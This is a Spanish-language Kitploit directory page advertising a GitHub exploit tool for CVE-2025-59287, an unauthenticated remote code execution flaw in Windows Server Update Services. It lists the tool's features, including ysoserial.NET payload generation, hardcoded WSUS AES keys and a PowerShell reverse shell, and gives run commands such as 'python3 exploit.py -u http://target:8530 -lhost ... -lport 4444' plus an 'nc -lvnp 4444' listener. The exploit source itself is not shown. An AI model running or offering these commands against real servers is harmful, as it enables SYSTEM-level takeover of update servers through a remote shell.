Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59287 — Exploit automatizado para CVE-2025-59287, una RCE no autenticada en WSUS, que incluye generación de payloads, listener de reverse shell y cifrado AES con claves hardcodeadas. | Kitploit
Herramientas/GitHubGitHub/garvitv14/cve-2025-59287
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Exploit automatizado para CVE-2025-59287, una RCE no autenticada en WSUS, que incluye generación de payloads, listener de reverse shell y cifrado AES con claves hardcodeadas.

Ver Repositorio
16277hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de CVE-2025-59287 WSUS

Exploit automatizado para la vulnerabilidad de ejecución remota de código no autenticada en Windows Server Update Services (WSUS).

Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-59287
  • Puntuación CVSS: 9.8 (Crítico)
  • Vector de Ataque: Red
  • Autenticación: No se requiere
  • Impacto: Ejecución remota de código como SYSTEM

Características

✅ Generación de payload totalmente automatizada
✅ Descarga automática de la dependencia ysoserial.NET
✅ Listener de reverse shell integrado
✅ Soporte multiplataforma (Windows/Linux/Mac)
✅ Cifrado AES con claves hardcodeadas de WSUS
✅ Payload de reverse shell en PowerShell

Requisitos

pip install -r requirements.txt

Dependencias de Python

Runtime .NET (Detección automática)

  • Windows: .NET Framework (integrado)
  • Linux/Mac: Wine o Mono Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete

Instalación

Clona o descarga los archivos del exploit

cd CVE-2025-59287-exploit

Ejecuta el exploit (descarga automáticamente ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost TU_IP -lport 4444

Uso

Explotación Básica

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

Si quieres la sesión en otro listener

Terminal 1: Inicia el listener de netcat

nc -lvnp 4444

Terminal 2: Ejecuta el exploit sin el listener integrado

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

Descargar herramienta